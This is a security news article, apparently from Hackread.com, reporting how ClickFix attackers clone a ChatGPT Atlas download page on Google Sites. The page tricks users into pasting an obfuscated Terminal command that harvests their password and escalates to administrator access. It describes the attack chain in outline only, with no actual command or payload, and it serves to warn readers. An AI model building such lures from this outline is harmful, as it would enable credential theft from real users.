Fake ChatGPT Atlas Browser Used in ClickFix Attack to Steal Passwords

A highly deceptive online threat, called the ClickFix attack, is causing serious concern within the cybersecurity community after recent reports showed a massive 517% surge in its use. Kaushik Devireddy, an AI data scientist at the human risk firm Fable Security, made a specific discovery about the threat and shared it with Hackread.com.

According to Devireddy’s research, hackers are exploiting this technique, which is commonly understood as a simple copy-paste trick, by distributing fake ChatGPT Atlas installers to manipulate people into running password-stealing software on their computers.

****Evolution of the ClickFix Threat****

For your information, the ClickFix attack is a form of social engineering where, instead of a simple email scam, users are tricked on cloned websites that look legitimate.

Hackread.com has persistently covered the evolution of this threat, reporting the tactic’s emergence in May 2024, and by April 2025, it was being used by government-backed hacking groups from countries like Iran (TA450), North Korea (TA427) and Russia (TA422) in their espionage campaigns.

This year, ClickFix attacks targeted everything from popular student platforms like iClicker and remote access tools like AnyDesk to widespread conferencing services like Google Meet and now ChatGPT Atlas.

Fake ChatGPT Atlas download shown in sponsored search (Screenshot: Hackread via Fable Security)

****The Fake Website Trap****

Regarding the latest ClickFix attack, Devireddy personally encountered a fake installer site for the ChatGPT Atlas AI browser. The imitation was so close with the same layout, design, and text, that the only small hint was the domain address. As Devireddy noted, “The only subtle giveaway was the domain: a Google Sites URL.” The common assumption that Google is highly trustworthy adds a false sense of security, which helps make this attack more successful.

Watch how it was done

****The Command Line Trap****

In his blog post, Devireddy states that this kind of attack uses a dangerous mix of site cloning, trusted hosting, obfuscated commands, and privilege escalation. The real danger starts when the fake site asks the user to copy a cryptic line of text and paste it into their computer’s command line, like Terminal. This is a crucial step because this is “the point where most people, especially curious or rushed users, might comply,” which is exactly what attackers require.

This harmless-looking command secretly runs a remote script that repeatedly asks the user for their password until the correct one is entered. Once stolen, the script uses the password to get elevated privileges or full administrator access (using the sudo command on a macOS system), a process known as privilege escalation. Now the malicious program can move from a standard user account to one with complete control, allowing it to do whatever it wants.

Further probing revealed that this blend of social engineering plus user-granted execution is so effective that it can bypass strong security tools like CrowdStrike and SentinelOne. To avoid becoming a victim, remember that simply searching for something and clicking the wrong link can lead to compromise, so never run command-line instructions given to you by a website.